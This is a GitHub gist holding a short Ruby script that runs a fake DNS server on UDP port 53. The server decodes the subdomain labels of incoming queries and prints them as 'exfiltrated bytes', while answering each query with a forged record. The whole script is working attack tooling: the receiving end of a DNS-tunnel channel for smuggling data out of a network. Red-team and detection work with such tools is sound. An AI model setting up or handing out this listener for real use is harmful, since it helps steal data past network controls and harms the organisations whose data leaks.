Skip to content

Instantly share code, notes, and snippets.

@trolldbois
Created December 4, 2013 23:05
Show Gist options
  • Save trolldbois/7797246 to your computer and use it in GitHub Desktop.
Save trolldbois/7797246 to your computer and use it in GitHub Desktop.
#!/usr/bin/ruby
#
# pass a domain (minus the tld) on cli to exclude from the output
#
require 'socket'
class UDPServer
def initialize(port)
@port = port
end
def start
@socket = UDPSocket.new
@socket.bind('', @port)
while true
data , soc = @socket.recvfrom(1024)
#domain = data.unpack('H*').join.reverse[0..-25].reverse[0..-11]
idx = 12
len = data[idx].ord
domain = ""
until len == 0 do
domain += data[idx + 1, len] + "."
idx += len + 1
len = data[idx].ord
end
# send our fake DNS response to back to the client
@socket.send(response(data), 0, soc[3], soc[1])
# print out our exfiltrated bytes
if ARGV[0] == nil then
puts domain.split(".")[0..-2].join
else
puts domain.split(".")[0..-2].join.sub(/#{ARGV[0]}/,'')
end
end
end
def response(data)
response = "#{data[0,2]}\x81\x00#{data[4,2] * 2}\x00\x00\x00\x00"
response += data[12..-1]
response += "\xc0\x0c\x00\x01\x00\x01"
response += [60].pack("N")
rdata = "1.1.1.1".split('.').collect(&:to_i).pack("C*")
response += [rdata.length].pack("n")
response += rdata
end
end
server = UDPServer.new(53)
server.start
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment